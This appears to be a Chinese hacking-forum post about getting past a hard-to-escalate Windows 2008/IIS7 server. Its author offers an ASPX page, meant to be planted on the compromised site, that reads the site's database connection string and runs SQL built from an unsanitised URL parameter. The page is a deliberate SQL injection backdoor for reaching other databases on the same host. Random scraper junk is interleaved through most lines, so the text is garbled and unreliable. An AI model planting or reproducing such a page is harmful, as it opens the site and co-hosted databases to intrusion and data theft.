利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
( S5 q: V5 f( w% M0 d7 e+ a5 [其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
  W( h2 \2 e3 v% T代码量不多，自己写个拉倒了。烦死了。
( b2 g9 a3 s# }7 Y( c
6 C3 N  d" c; c# m9 H* i$ \' t6 v​
1 G4 P2 s/ a/ K% ^, p; U$ _<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4 K1 ?% r( A: e' ^<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
* d/ j: r, c( k* F: x; A( D    <title>暗影aspx构造注射专用页面</title>
/ V4 E2 j8 J, D* I1 {4 j</head>
<body>
+ S" r& \7 {. ?( K( g6 Q    <form id="form1" runat="server">
# \1 P; i( e6 D4 p4 i$ }: \    <div>
     <script language="c#" runat="server">
            
" d+ S+ t- T( R1 h& q9 U1 F) H         void page_init(object sender, EventArgs e)
         {
2 n# y8 t& i1 x0 y( v            
2 z7 D7 @& T2 Z5 O3 M0 K             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
            
             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
             conn.Open();
  [! f% Y8 T( x$ n& i' @, p4 P) [            
+ a8 e, G; D4 a4 U  P/ x             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
+ Q& g$ a; J" o4 j6 g1 J; d: Q1 S            
3 t/ |. A0 \  n0 B0 ~( P             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
             int x = command.ExecuteNonQuery();
             Response.Write(i+"\n");
             Response.Write(x);
             conn.Close();
$ o, K' l) ]" F5 {9 f0 T         }
4 O. s' ~* ?7 s3 Y! |8 C+ u# Z6 [     
6 T  N7 U7 I3 b  </script>
+ q9 V- }; _/ L2 K0 F7 l  v1 S    </div>
4 O' A" _4 c! q* v+ B    </form>
</body>
</html>
" X3 Q" @+ i- F8 I8 y